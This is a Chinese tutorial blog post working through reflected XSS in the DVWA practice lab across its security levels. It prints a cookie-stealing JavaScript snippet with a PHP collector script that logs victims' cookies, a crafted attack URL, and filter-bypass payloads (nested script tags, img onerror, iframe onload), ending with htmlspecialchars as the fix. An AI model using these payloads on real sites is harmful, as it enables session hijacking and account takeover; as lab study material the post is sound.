IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> XSS反射型在DVWA靶场下详细实战演练 -> 正文阅读

[PHP知识库]XSS反射型在DVWA靶场下详细实战演练


一、反射型

1.等级为low

1.1 在上篇文章,low等级的已经做过简单的Cookie示范,这里做一个补充。

先建立文本

D.js

var img = new Image();
img.src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/D.php?x=" + document.cookie;
document.body.append(img);

D.php

<?php
$cookie = $_GET['x'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

在这里插入图片描述
我们要生成链接获取cookie 构造语句(script标签):

http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/hacker.js" /></script>

然后这个url发给另一个用户后,这个用户点开并且输入了自己的姓名
在这里插入图片描述

我们会得到一个cookie。txt文件,里面就包含cookie。
在此时,我们可以登录DVWA
在这里插入图片描述
使用我们得到的cookie进行登录。

2.等级为medium

2.1测试过滤方式

按照惯例,我们还是测试是否存在xss漏洞
在这里插入图片描述
这里发现没有弹窗。
查看源码后发现
在这里插入图片描述

 $name = str_replace( '<script>', '', $_GET[ 'name' ] );

这是str_replace()函数,意思是查看name内是否有script,有则把它替换成空格。简单的黑名单过滤。
对于str_replace()函数我们也可以通过双写绕过(内嵌)

<scr<script>ipt>alert(/xss/);</script>
原来是<script>alert(/xss/)</script>

然后再次进行测试,能够正常弹出。
在这里插入图片描述

2.2使用其他标签

也可以使用也可以使用非 script 标签的 xss payload绕过(替换)
img标签:

<img src=1 onerror=alert('xss')>

iframe标签:

<iframe onload=alert(1)>

例如:
在这里插入图片描述
在SQL注入中,对于被过滤的关键词可以采用以下这几种方法:(大小写.转义.内嵌.替换)
上面那个双写绕过就是内嵌.
大小写:

<Script>alert('XSS')</Script>

替换:使用其他标签来替换

<img src="#" οnerrοr=alert('XSS')>

3.等级为high

还是输入那个一般语句进行测试,发现只剩下一个>,则应该是前面部分全部被过滤。猜测是更高级的黑名单过滤。
在这里插入图片描述
就像上面medium等级写的,可以使用其他非script的标签进行绕过。
例如使用img标签就可以成功。
在这里插入图片描述

4.等级为impossible

调换等级后发现,无论输入什么,都是这个样子。啊,对此我有点无语,这什么鬼,hello都不显?
在这里插入图片描述
好了,查看一下源码吧。ok,查看文件代码发现
在这里插入图片描述
这里使用了htmlspecialchars()函数,此函数是使用来把一些预定义的字符转换为HTML实体,返回转换后的新字符串,原字符串不变。如果 string 包含无效的编码,则返回一个空的字符串,除非设置了 ENT_IGNORE 或者 ENT_SUBSTITUTE 标志。
在此要讲的是:
XSS攻击的核心就是靠HTMLscript>标签或元素属性来执行Javascript脚本。
而 htmlspecialchars 则可以转义 <> ,这样就无法通过script标签攻击。同时又可以过滤掉双引号,单引号(需要另外加个参数),阻止靠元素属性来触发事件执行脚本

基本样子为:

& (和号) 成为 &amp;
" (双引号) 成为 &quot;
' (单引号) 成为 &apos;
< (小于) 成为 &lt;
> (大于) 成为 &gt;

所以impossible使用的这个函数,使得此等级不存在xss漏洞。
(我这个目录怎么有点强迫症的feel,腿麻了。今天存储型写不完了啊啊啊啊,明天再更。)

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-22 20:18:59  更:2022-03-22 20:19:34 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 10:41:21-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码